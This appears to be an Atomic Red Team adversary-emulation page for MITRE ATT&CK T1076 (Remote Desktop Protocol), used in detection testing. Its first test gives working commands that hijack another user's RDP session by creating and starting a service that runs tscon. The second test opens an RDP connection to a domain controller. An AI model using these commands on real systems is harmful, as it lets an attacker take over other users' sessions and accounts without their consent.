# T1076 - Remote Desktop Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1076)
<blockquote>Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)

Adversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)</blockquote>

## Atomic Tests

- [Atomic Test #1 - RDP hijacking](#atomic-test-1---rdp-hijacking)

- [Atomic Test #2 - RDPto-DomainController](#atomic-test-2---rdpto-domaincontroller)


<br/>

## Atomic Test #1 - RDP hijacking
RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| Session_ID | The ID of the session to which you want to connect | String | 1337|
| Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55|


#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 


```cmd
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon #{Session_ID} /dest:#{Destination_ID}"
net start sesshijack
```

#### Cleanup Commands:
```cmd
sc.exe delete sesshijack >nul 2>&1
```





<br/>
<br/>

## Atomic Test #2 - RDPto-DomainController
Attempt an RDP session via "Connect-RDP" to a system. Default RDPs to (%logonserver%) as the current user

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| logonserver | ComputerName argument default %logonserver% | String | $ENV:logonserver.TrimStart("&#92;")|
| username | Username argument default %USERDOMAIN%&#92;%username% | String | $Env:USERDOMAIN&#92;$ENV:USERNAME|


#### Attack Commands: Run with `powershell`! 


```powershell
Connect-RDP -ComputerName #{logonserver} -User #{username}
```




#### Dependencies:  Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```powershell
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1} 
```
##### Get Prereq Commands:
```powershell
Write-Host Joining this computer to a domain must be done manually
```




<br/>
